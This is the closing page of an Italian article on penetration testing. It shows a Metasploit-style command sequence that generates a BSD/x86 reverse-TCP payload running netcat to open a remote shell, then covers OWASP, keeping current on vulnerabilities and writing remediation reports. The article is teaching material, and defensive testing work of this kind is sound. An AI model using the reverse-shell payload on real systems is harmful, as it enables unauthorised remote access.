PC robusto? Un penetration test e lo scopri subito

Solo un’analisi accurata delle vulnerabilità può dirti se un computer e la LAN a cui appartiene sono adeguatamente protetti contro exploit e attacchi di altro tipo

(pagina 5 di 5)

use bsd/x86/exec/reverse_tcp

Successivamente creiamo il nostro payload che dovrà, su architettura x86 e sistema BSD, eseguire il comando Netcat e aprire una shell remota:

generate –o LHOST=127.0.0.1,LPORT=7777,RHOST=

1.1.1. 1,RPORT=9999,CMD=netcat –e x86/jmp_call

_additive –b ‘\x00\xff’ –t c

Gli esempi riportati nel corso dell’articolo hanno scopo puramente didattico, quindi, senza alcun riscontro concreto. Per un utilizzo e mirato del framework in modo tale da poter eseguire test d’intrusione accurati rimandiamo al sito ufficiale del progetto dove è possibile trovare documentazione sull’argomento.

Tiriamo le somme

Da quanto detto fin qui, è chiaro che le strade da seguire per poter effettuare un Penetration Test sono numerose e dipendono da esigenze soggettive. Noi ne abbiamo mostrato solo alcune, anche se selezionate tra quelle più diffuse e potenti. I tool messi a disposizione, sono tutti molto efficaci e potenti, e se utilizzati correttamente, in grado di fornire ottimi risultati. Un buon amministratore di sistema non può prescindere dall’uso di questi strumenti che gli permettono di testare a fondo e rapidamente i servizi offerti e valutare rischi e pericoli. Così facendo, è possibile anticipare eventuali attacchi e studiare le strategie di difesa corrette. Inoltre, bisogna essere sempre aggiornati sulle nuove vulnerabilità scoperte consultando periodicamente siti specializzati o iscrivendosi a newsletter specifiche in modo da avere sempre chiara la situazione sicurezza. Un buon punto di riferimento è il sito dell’OWASP “ The free and open application security community”(www.owasp. org). Al termine di una sessione di test è sempre necessario stilare un report dettagliato nel quale sono evidenziati i bug riscontrati e le problematiche rilevate a livello di rete, di applicativi e di servizi. Inoltre, nel report è buona norma inserire sempre nel dettaglio la strategia migliore per riparare le falle individuate o almeno come poterle isolare. Infine, deve sempre essere documentato l’intero processo di “intrusione”, le tecniche utilizzate e l’eventualità di reperire materiale (codice o software) in rete.